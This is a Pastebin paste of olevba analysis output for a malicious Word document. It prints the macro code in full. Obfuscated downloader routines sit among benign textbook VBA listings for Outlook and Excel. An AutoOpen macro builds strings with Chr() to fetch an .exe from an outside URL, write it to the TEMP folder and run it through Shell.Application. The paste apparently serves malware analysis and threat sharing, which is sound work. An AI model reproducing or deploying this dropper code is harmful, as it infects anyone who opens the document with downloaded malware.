SHARE
TWEET

Malicious Word macro

dynamoo Jul 1st, 2015 298 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- compin~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: compin~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: compin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. Nip121ÖÊÂ3017 (5.003)
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Double)
  23.  
  24. px4vMaz62GyVze
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public VSvsdvve As Integer
  41. Public lw6wgKatg As String
  42. Public FEveEv As Double
  43. Public VSeeve As Long
  44.  
  45. '
  46. ' Listing 22.1. A procedure that enumerates the first- and
  47. ' second-level folders in the Outlook namespace.
  48. '
  49. Sub EnumerateFolders()
  50.     '
  51.    ' Set up the namespace
  52.    '
  53.    Set ns = ThisOutlookSession.Session
  54.     '
  55.    ' Run through the first-level folders
  56.    '
  57.    For Each folder In ns.Folders
  58.         Debug.Print folder.Name
  59.         '
  60.        ' Run through the second-level folders, if any
  61.        '
  62.        If folder.Folders.Count > 1 Then
  63.             For Each subfolder In folder.Folders
  64.                 Debug.Print "   " & subfolder.Name
  65.             Next 'subfolder
  66.        End If
  67.     Next 'folder
  68.    Set ns = Nothing
  69. End Sub
  70. '
  71. ' Listing 22.2. A procedure to test the PickFolder method
  72. '
  73. Sub PickFolderTest()
  74.     ' Set up the namespace
  75.    '
  76.    Set ns = ThisOutlookSession.Session
  77.     '
  78.    ' Display the Select Folder dialog box
  79.    '
  80.    Set folder = ns.PickFolder
  81.     '
  82.    ' Test the return value
  83.    '
  84.    If Not folder Is Nothing Then
  85.         MsgBox "You picked " & folder.Name
  86.     End If
  87. End Sub
  88. '
  89.  
  90. ' Listing 22.3. A procedure that toggles the Web view
  91. ' on and off for the currently displayed folder.
  92. '
  93. Sub ToggleWebView()
  94.     '
  95.    ' Set up the namespace and get the explorer
  96.    '
  97.    Set ns = ThisOutlookSession.Session
  98.     '
  99.    ' Save the current folder
  100.    '
  101.    Set currFolder = r.exp.CurrentFolder
  102.     '
  103.    ' Move temporarily to the root
  104.    '
  105.    Set c.exp.CurrentFolder = ns.Folders(1)
  106.     '
  107.    ' Toggle Web view for the current folder
  108.    '
  109.    currFolder.WebViewOn = Not currFolder.WebViewOn
  110.     '
  111.    ' Return to the current folder
  112.    '
  113.    Set a.exp.CurrentFolder = currFolder
  114. End Sub
  115. '
  116. ' Listing 22.4. A Function that determines the
  117. ' e-mail address of the sender.
  118. '
  119. Function SenderAddress(msg As String) As String
  120.     '
  121.    ' Create a temporary reply
  122.    '
  123.    Set replyItem = y.msg.Reply
  124.     '
  125.    ' The Reply's "To" property holds the sender's address
  126.    '
  127.    SenderAddress = replyItem.To
  128.     Set replyItem = Nothing
  129. End Function
  130. '
  131. ' Use this procedure to test the SenderAddress function.
  132. '
  133. Sub SenderAddressTest()
  134.     '
  135.    ' Set up the namespace and Inbox
  136.    '
  137.    Set ns = ThisOutlookSession.Session
  138.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  139.     '
  140.    ' Display the sender's address for a message
  141.    '
  142.    MsgBox SenderAddress(ib.Items(2))
  143. End Sub
  144. '
  145. ' Listing 22.5. A procedure that processes Inbox messages.
  146. '
  147.  
  148.  
  149.  
  150. Public Function LKJNmJKILHB(NVIEOIB As String)
  151.  Set LKJNmJKILHB = CreateObject(NVIEOIB)
  152. End Function
  153. Sub ProcessInboxMessages()
  154.     '
  155.    ' Set up the namespace
  156.    '
  157.    Set ns = ThisOutlookSession.Session
  158.     '
  159.    ' Get the default Inbox folder
  160.    '
  161.    Set ib = ns.GetDefaultFolder(olFolderInbox)
  162.     '
  163.    ' Run through each item in the Inbox
  164.    '
  165.    For Each msg In ib.Items
  166.         '
  167.        ' Flag important messages
  168.        '
  169.        If msg.Importance = olImportanceHigh Then
  170.             msg.FlagStatus = olFlagMarked
  171.             msg.FlagRequest = "Handle this, will ya!"
  172.             msg.FlagDueBy = Date + 7
  173.             msg.Importance = olImportanceNormal
  174.             msg.Save
  175.         End If
  176.         '
  177.        ' Look for expired flags
  178.        '
  179.        If msg.FlagDueBy < Date Then
  180.             msg.Display
  181.             MsgBox "The displayed message has an expired flag!"
  182.         End If
  183.         '
  184.        ' Move sensitive messages to "Confidential" folder
  185.        '
  186.        If msg.Sensitivity = olConfidential Then
  187.             msg.Move ns.Folders(1).Folders("Confidential")
  188.         End If
  189.     Next 'msg
  190. End Sub
  191.  
  192. '
  193. ' Listing 22.6. A procedure that sends an e-mail message
  194. '
  195. Sub SendAMessage()
  196.     ' Set up the namespace
  197.    '
  198.    Set ns = ThisOutlookSession.Session
  199.     '
  200.    ' Create the new MailItem
  201.    '
  202.    Set msg = Applicy.ation.CreateItem(olMailItem)
  203.     '
  204.    ' Specify the recipient, subject, and body
  205.    ' and then send the message
  206.    '
  207.    With msg
  208.         '
  209.        ' Adjust the following address!
  210.        '
  211.        .Recipients.Add "bitbucket@mcfedries.com"
  212.         .Subject = "Just Testing"
  213.         .Body = "This is only a test"
  214.         .Send
  215.     End With
  216. End Sub
  217. '
  218.  
  219.  
  220. ' Listing 22.7. A procedure that creates a forwarded message
  221. ' and deletes any existing attachments before sending it.
  222. '
  223. Sub ForwardAndDeleteAttachments()
  224.     '
  225.    ' Set up the namespace and Inbox
  226.    '
  227.    Set ns = ThisOutlookSession.Session
  228.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  229.     '
  230.    ' Create the forwarded MailItem
  231.    '
  232.    Set msg = ib.Items(ib.Items.Count).Forward
  233.     With msg
  234.         '
  235.        ' Delete all the attachments
  236.        '
  237.        For Each att In .Attachments
  238.             att.Delete
  239.         Next 'att
  240.        '
  241.        ' Send it (change the address!)
  242.        '
  243.        .Recipients.Add "selene@mcfedries.com"
  244.         .Send
  245.     End With
  246. End Sub
  247. '
  248.  
  249. ' Listing 22.8. A procedure that stores a password
  250. ' in a folder's Description property.
  251. '
  252. Sub SetPassword()
  253.     ' Set up the namespace
  254.    '
  255.    Set ns = ThisOutlookSession.Session
  256.     '
  257.    ' Save the password in the folder's Description property
  258.    '
  259.    Set folder = ns.Folders(1).Folders("Confidential")
  260.     folder.Description = "password"
  261. End Sub
  262.  
  263. '
  264. ' Listing 22.9. An event handler that asks the user for
  265. ' a password before switching to the "Confidential" folder.
  266. '
  267.  
  268.  
  269.  
  270. Public Function A06WNXrxh(MmXQ1eLmZ As String)
  271.  Set d6eiGTziQd = LKJNmJKILHB("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  272. d6eiGTziQd.Open (lw6wgKatg)
  273. End Function
  274. Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
  275.     If NewFolder.Name = "Confidential" Then
  276.         pwd = InputBox("Please enter the password for this folder:")
  277.         If pwd <> NewFolder.Description Then
  278.             Cancel = True
  279.         End If
  280.     End If
  281. End Sub
  282. '
  283. ' Use this event handler to insure that the gExplorer
  284. ' global variable gets instantiated at startup
  285. '
  286. Private Sub Application_Startup()
  287.     Set gExplorer = Applicat.ion.ActiveExplorer
  288. End Sub
  289. '
  290. ' Listing 22.10. An event handler for the MailItem object's Send event.
  291. '
  292. Private Sub gMailItem_Send(Cancel As Boolean)
  293.     Dim result As Integer
  294.     result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
  295.     If result = vbNo Then
  296.         gMailItem.DeleteAfterSubmit = True
  297.     End If
  298. End Sub
  299. '
  300. ' Listing 22.11. A procedure that sends an e-mail message and
  301. ' references the global gMailItem variable to trap events.
  302. '
  303. Sub SendAMessage2()
  304.     '
  305.    ' Set up the namespace
  306.    '
  307.    Set ns = ThisOutlookSession.Session
  308.     '
  309.    ' Create the new MailItem using the
  310.    ' gMailItem global variable
  311.    '
  312.    Set gMailItem = Appl.ication.CreateItem(olMailItem)
  313.     '
  314.    ' Specify the recipient, subject, and body
  315.    ' and then send the message
  316.    '
  317.    With gMailItem
  318.         '
  319.        ' Adjust the following address!
  320.        '
  321.        .Recipients.Add "bitbucket@mcfedries.com"
  322.         .Subject = "Just Testing Events"
  323.         .Body = "This is only an events test"
  324.         .Send
  325.     End With
  326. End Sub
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | Suspicious | Open           | May open a file                         |
  333. | Suspicious | Chr            | May attempt to obfuscate specific       |
  334. |            |                | strings                                 |
  335. | Suspicious | CreateObject   | May create an OLE object                |
  336. | Suspicious | Run            | May run an executable file or a system  |
  337. |            |                | command                                 |
  338. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  339. |            |                | may be used to obfuscate strings        |
  340. |            |                | (option --decode to see all)            |
  341. +------------+----------------+-----------------------------------------+
  342. -------------------------------------------------------------------------------
  343. VBA MACRO Module2.bas
  344. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module2'
  345. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  346. '
  347. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  348. '
  349. Sub GetNumbers()
  350.     Dim done As Boolean
  351.     Dim divisor As Variant
  352.     Dim dividend As Variant
  353.     '
  354.    ' Prompt user for dividend and divisor.
  355.    '
  356.    done = False
  357.     Do While Not done
  358.         dividend = InputBox("Enter the dividend:", "Divider")
  359.         divisor = InputBox("Enter the divisor:", "Divider")
  360.         done = Divide(dividend, divisor)
  361.     Loop
  362. End Sub
  363. '
  364.  
  365. Public Function VBveEPIB(jIAuThroV99z As Variant, dicVrTXgN As String)
  366. Dim KKOWIPA: Set KKOWIPA = LKJNmJKILHB(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
  367.  
  368. With KKOWIPA
  369.    .Type = 1
  370.     .Open
  371.     .write jIAuThroV99z
  372.     .savetofile dicVrTXgN, 2
  373. End With
  374. End Function
  375.  
  376. ' Listing 23.2. The Divide function divides the dividend by the divisor.
  377. ' The function traps "division by zero" errors.
  378. '
  379. Function Divide(dividend, divisor) As Boolean
  380.     Dim msg As String
  381.     Dim result As Single
  382.     '
  383.    ' Set the trap
  384.    '
  385.    On Error GoTo DivByZeroHandler
  386.     '
  387.    ' Peform the division
  388.    '
  389.    result = dividend / divisor
  390.     '
  391.    ' If it went okay, display the result
  392.    '
  393.    msg = dividend & _
  394.           " divided by " & _
  395.           divisor & _
  396.           " equals " & _
  397.           result
  398.     MsgBox msg
  399.     '
  400.    ' Set the return value and bypass the error handler
  401.    '
  402.    Divide = True
  403.     Exit Function
  404.     '
  405.    ' Code branches here if an error occurs
  406.    '
  407. DivByZeroHandler:
  408.     '
  409.    ' Display the error message
  410.    '
  411.    result = MsgBox("You entered 0 as the divisor! Try again?", _
  412.                     vbYesNo + vbQuestion, _
  413.                     "Divider")
  414.     '
  415.    ' Return the user's choice
  416.    '
  417.    If result = vbYes Then
  418.         Divide = False
  419.     Else
  420.         Divide = True
  421.     End If
  422. End Function
  423. '
  424. ' Listing 23.3 Backs up the active workbook to a drive specified by
  425.  
  426.  
  427. Sub px4vMaz62GyVze()
  428.  
  429. Set ppVZZF1t = LKJNmJKILHB("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
  430.  
  431. CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
  432. , "h" & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "d" & "e" & "m" & Chr(97) & "i" & "f" & "f" & "e" & "." & Chr(98) & Chr(101) & "/" & Chr(55) & "5" & Chr(47) & Chr(56) & Chr(53) & Chr(46) & "e" & "x" & Chr(101) _
  433. , False
  434.  
  435. Set cenPup7VnpnK = LKJNmJKILHB(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
  436.  
  437. Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
  438.  
  439. mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
  440.  
  441. lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
  442. Dim FLLSJmKUYRVHQ() As Byte
  443.  
  444. CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
  445. FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
  446. VBveEPIB FLLSJmKUYRVHQ, lw6wgKatg
  447. On Error GoTo PA4FeaqAL
  448.     a = 84 / 0
  449.   On Error GoTo 0
  450.  
  451. JRyXdhZR:
  452.   Exit Sub
  453. PA4FeaqAL:
  454.   A06WNXrxh ("AU7CVXKyNxAAi")
  455. Resume JRyXdhZR
  456. End Sub
  457.  
  458. ' the user. Traps any errors (such as having no disk in the drive).
  459. '
  460. Sub BackUpToFloppy()
  461.     Dim backupDrive As String
  462.     Dim backupName As String
  463.     Dim msg As String
  464.     Dim done As Boolean
  465.     Dim result As Integer
  466.     '
  467.    ' Define the location of the error handler
  468.    '
  469.    On Error GoTo ErrorHandler
  470.     '
  471.    ' Initialize some variables and then loop
  472.    '
  473.    Application.DisplayAlerts = False
  474.     done = False
  475.     backupDrive = "A:"
  476.     While Not done
  477.         '
  478.        ' Get the drive to use for the backup
  479.        '
  480.        backupDrive = InputBox( _
  481.             Prompt:="Enter the drive letter for the backup:", _
  482.             Title:="Backup", _
  483.             Default:=backupDrive)
  484.         '
  485.        ' Check to see if OK was selected
  486.        '
  487.        If backupDrive <> "" Then
  488.             '
  489.            ' Make sure the backup drive contains a colon (:)
  490.            '
  491.            If InStr(backupDrive, ":") = 0 Then
  492.                 backupDrive = Left(backupDrive, 1) & ":"
  493.             End If
  494.             '
  495.            ' First, save the file
  496.            '
  497.            ActiveWorkbook.Save
  498.             '
  499.            ' Assume the backup will be successful,
  500.            ' so set done to True to exit the loop
  501.            '
  502.            done = True
  503.             '
  504.            ' Concatenate drive letter and workbook name
  505.            '
  506.            backupName = backupDrive & ActiveWorkbook.Name
  507.             '
  508.            ' Make a copy on the specified drive
  509.            '
  510.            ActiveWorkbook.SaveCopyAs FileName:=backupName
  511.         Else
  512.             Exit Sub
  513.         End If
  514.     Wend
  515.     '
  516.    ' Bypass the error handler
  517.    '
  518.    Exit Sub
  519.     '
  520.    ' Code branches here if an error occurs
  521.    '
  522. ErrorHandler:
  523.     msg = "An error has occurred!" & Chr(13) & Chr(13) & _
  524.           "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
  525.           "letter, or Ignore to attempt the backup again."
  526.     result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
  527.     Select Case result
  528.         Case vbAbort
  529.             done = True
  530.         Case vbRetry
  531.             done = False
  532.             Resume Next
  533.         Case vbIgnore
  534.             Resume
  535.     End Select
  536. End Sub
  537. '
  538. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  539.  
  540. ' errors: division by zero, overflow, and type mismatch.
  541. '
  542. Sub DivideNumbers()
  543.     Dim msg As String
  544.     Dim result As Single
  545.     Dim divisor As Variant
  546.     Dim dividend As Variant
  547.     '
  548.    ' Set the trap
  549.    '
  550.    On Error GoTo DivByZeroHandler
  551.     '
  552.    ' Prompt user for the dividend
  553.    '
  554. GetDividendAndDivisor:
  555.     dividend = InputBox("Enter the dividend:", "Divider")
  556.     If dividend = "" Then Exit Sub
  557.     '
  558.    ' Prompt user for the divisor
  559.    '
  560. GetDivisorOnly:
  561.     divisor = InputBox("Enter the divisor:", "Divider")
  562.     If divisor = "" Then Exit Sub
  563.     '
  564.    ' Peform the division
  565.    '
  566.    result = dividend / divisor
  567.     '
  568.    ' If it went okay, display the result
  569.    '
  570.    msg = dividend & _
  571.           " divided by " & _
  572.           divisor & _
  573.           " equals " & _
  574.           result
  575.     MsgBox msg
  576.     '
  577.    ' Bypass the error handler
  578.    '
  579.    Exit Sub
  580.     '
  581.    ' Code branches here if an error occurs
  582.    '
  583. DivByZeroHandler:
  584.     '
  585.    ' Display the error message
  586.    '
  587.    msg = "An error occurred!" & Chr(13) & Chr(13) & _
  588.           "Error number:  " & Err.Number & Chr(13) & _
  589.           "Error message: " & Err.Description
  590.     MsgBox msg, vbOKOnly + vbCritical
  591.     '
  592.    ' Check the error number
  593.    '
  594.    Select Case Err.Number
  595.         '
  596.        ' Division by zero
  597.        '
  598.        Case 11
  599.             Resume GetDivisorOnly
  600.         '
  601.        ' Overflow
  602.        '
  603.        Case 6
  604.             Resume GetDividendAndDivisor
  605.         '
  606.        ' Type mismatch
  607.        '
  608.        Case 13
  609.             If Not IsNumeric(dividend) Then
  610.                 Resume GetDividendAndDivisor
  611.             Else
  612.                 Resume GetDivisorOnly
  613.             End If
  614.         '
  615.        ' Anything else, just quit
  616.        '
  617.        Case Else
  618.             Exit Sub
  619.     End Select
  620. End Sub
  621.  
  622. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  623. ANALYSIS:
  624. +------------+------------+-----------------------------------------+
  625. | Type       | Keyword    | Description                             |
  626. +------------+------------+-----------------------------------------+
  627. | Suspicious | Open       | May open a file                         |
  628. | Suspicious | Chr        | May attempt to obfuscate specific       |
  629. |            |            | strings                                 |
  630. | Suspicious | SaveToFile | May create a text file                  |
  631. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  632. |            |            | function calls                          |
  633. | Suspicious | Write      | May write to a file (if combined with   |
  634. |            |            | Open)                                   |
  635. +------------+------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top